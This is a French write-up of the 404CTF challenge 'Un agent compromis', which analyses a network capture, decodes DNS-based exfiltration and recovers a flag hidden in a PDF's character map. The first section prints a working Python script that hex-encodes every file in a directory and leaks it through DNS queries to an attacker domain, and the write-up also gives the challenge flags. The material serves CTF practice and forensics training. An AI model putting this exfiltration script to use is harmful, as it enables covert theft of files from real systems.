# Un agent compromis [1/3]

Nous avons surpris un de nos agents en train d'envoyer des fichiers confidentiels depuis son ordinateur dans nos locaux vers **Hallebarde**. Malheureusement, il a eu le temps de finir l'exfiltration et de supprimer les fichiers en question avant que nous l'arrêtions.

Heureusement, nous surveillons ce qu'il se passe sur notre réseau et nous avons donc une capture réseau de l'activité de son ordinateur. Retrouvez le fichier qu'il a téléchargé pour exfiltrer nos fichiers confidentiels.

Fichier: [capture-reseau.pcapng](https://mega.nz/file/B5oViQDZ#GTd8IzhVEuJLdYPEj9AbY15Q3puNUUcKMRoxjAIq--I)

Auteur : `Typhlos#9037`

**Solution**

On ouvre la capture et comme on est dans un CTF, on recherche immédiatement un flag avec le filtre `tcp contains "404CTF"`. Et bingo, on trouve un `GET /Exfiltration.py` :

```
GET /exfiltration.py HTTP/1.1
Host: hallebarde.404ctf.fr
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://hallebarde.404ctf.fr/
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Date: Tue, 24 May 2022 18:49:06 GMT
Content-Type: text/x-python
Content-Length: 1162
Connection: keep-alive
Last-Modified: Tue, 24 May 2022 18:45:53 GMT

import binascii
import os
import dns.resolver
import time

def read_file(filename):
    with open(filename, "rb") as f:
        return binascii.hexlify(f.read())


def exfiltrate_file(filename):
    dns.resolver.resolve("never-gonna-give-you-up.hallebarde.404ctf.fr")
    time.sleep(0.1)
    dns.resolver.resolve(binascii.hexlify(filename.encode()).decode() + ".hallebarde.404ctf.fr")
    content = read_file(filename)
    time.sleep(0.1)
    dns.resolver.resolve("626567696E.hallebarde.404ctf.fr")
    time.sleep(0.1)
    for i in range(len(content)//32):
        hostname = content[i * 32: i * 32 + 32].decode()
        dns.resolver.resolve(hostname + ".hallebarde.404ctf.fr")
        time.sleep(0.1)
    if len(content) > (len(content)//32)*32:
        hostname = content[(len(content)//32)*32:].decode()
        dns.resolver.resolve(hostname + ".hallebarde.404ctf.fr")
        time.sleep(0.1)
    dns.resolver.resolve("656E64.hallebarde.404ctf.fr")
    time.sleep(60)


if __name__ == "__main__":
    files = os.listdir()
    print(files)
    for file in files:
        print(file)
        exfiltrate_file(file)


flag = """404CTF{t3l3ch4rg3m3n7_b1z4rr3}"""
```


# Un agent compromis [2/3]

Maintenant, nous avons besoin de savoir quels fichiers il a exfiltré.

Format du flag : `404CTF{fichier1,fichier2,fichier3,...}` Le nom des fichiers doit être mis par ordre alphabétique.

Auteur : `Typhlos#9037`

**Solution**

Par analyse du script récupéré à l'étape précédente, on voit que l'exfiltration se fait par requêtes DNS sur le domaine `.hallebarde.404ctf.fr`. Le principe d'exfiltration d'un fichier est le suivant :
- résolution de `never-gonna-give-you-up`
- résolution sur le nom du fichier exfiltré
- résolution de `begin`
- résolutions successives avec le contenu du fichier
- résolution de `end`

En dehors de `never-gonna-give-you-up`, les autres noms sont codés en hexadécimal.

On [scripte tout ça](solve2.py) et on obtient le flag `404CTF{exfiltration.py,flag.txt,hallebarde.png,super-secret.pdf}`.

# Un agent compromis [3/3]

Il semblerait que l'agent compromis a effacé toutes les sauvegardes des fichiers qu'il a exfiltré. Récupérez le contenu des fichiers.

Auteur : `Typhlos#9037`

**Solution**

On complète le code écrit à l'étape précédente pour [dumper le contenu des fichiers exfiltrés](solve3.py) :
```console
$ python3 ./solve3.py
Writing flag.txt
Writing hallebarde.png
Writing super-secret.pdf
Writing exfiltration.py
```

Le [flag.txt](flag.txt) ne contient (évidemment) pas de flag. L'image [hallebarde.png](hallebarde.png) paraît normale. Le PDF est en revanche louche, puisqu'il n'affiche qu'une page blanche. Tenter de sélectionner le texte présent dedans ne donne pas grand chose. L'ouvrir avec un éditeur de texte montre que le PDF est essentiellement composé de streams. Pour les inspecter, on va utiliser [le parser de Didier Stevens](https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py)


À tâtons, on voit que l'objet 8 décrit une table de caractères :
```console
$ python3 pdf-parser.py -o 8 -f super-secret.pdf
obj 8 0
 Type: 
 Referencing: 
 Contains stream

  <<
    /Length 334
    /Filter /FlateDecode
  >>

 b'/CIDInit/ProcSet findresource begin\n12 dict begin\nbegincmap\n/CIDSystemInfo<<\n/Registry (Adobe)\n/Ordering (UCS)\n/Supplement 0\n>> def\n/CMapName/Adobe-Identity-UCS def\n/CMapType 2 def\n1 begincodespacerange\n<00> <FF>\nendcodespacerange\n24 beginbfchar\n<01> <0034>\n<02> <0030>\n<03> <0043>\n<04> <0054>\n<05> <0046>\n<06> <007B>\n<07> <0044>\n<08> <004E>\n<09> <0053>\n<0A> <005F>\n<0B> <0033>\n<0C> <0078>\n<0D> <0066>\n<0E> <0031>\n<0F> <006C>\n<10> <0074>\n<11> <0072>\n<12> <006E>\n<13> <0068>\n<14> <0061>\n<15> <0065>\n<16> <0062>\n<17> <0064>\n<18> <007D>\nendbfchar\nendcmap\nCMapName currentdict /CMap defineresource pop\nend\nend\n'
```

Il s'agit d'une correspondance entre des index et des codes ASCII, et on trouve tout ce qu'il faut pour faire un flag :

Index | HEX | ASCII
:----:|:---:|:-----:
<01> | <0034> | 4
<02> | <0030> | 0
<03> | <0043> | C
<04> | <0054> | T
<05> | <0046> | F
<06> | <007B> | {
<07> | <0044> | D
<08> | <004E> | N
<09> | <0053> | S
<0A> | <005F> | _
<0B> | <0033> | 3
<0C> | <0078> | x
<0D> | <0066> | f
<0E> | <0031> | 1
<0F> | <006C> | l
<10> | <0074> | t
<11> | <0072> | r
<12> | <006E> | n
<13> | <0068> | h
<14> | <0061> | a
<15> | <0065> | e
<16> | <0062> | b
<17> | <0064> | d
<18> | <007D> | }


Le flag est présent dans l'objet 2:

```console
$ python3 pdf-parser.py -o 2 -f super-secret.pdf
obj 2 0
 Type: 
 Referencing: 3 0 R
 Contains stream

  <<
    /Length 3 0 R
    /Filter /FlateDecode
  >>

 b'0.1 w\nq 0 0.028 595.275 841.861 re\nW* n\nq 0 0 0 rg\nBT\n56.8 773.989 Td /F1 12 Tf[<0102010304>2<05>-1<06>-3<07>5<08>-2<09>-1<0A0B0C0D0E0F>2<10>2<1101>-7<10>2<0E02120A1314>1<0F>2<0F>-5<15>1<1614>1<111715>1<18>]TJ\nET\nQ\nQ '
```

Dans la dernière ligne, on remplace les éléments `<XX(...)>` par leur représentation ASCII de la table vue ci-dessus, et on obtient le flag `404CTF{DNS_3xf1ltr4t10n_hallebarde}`.
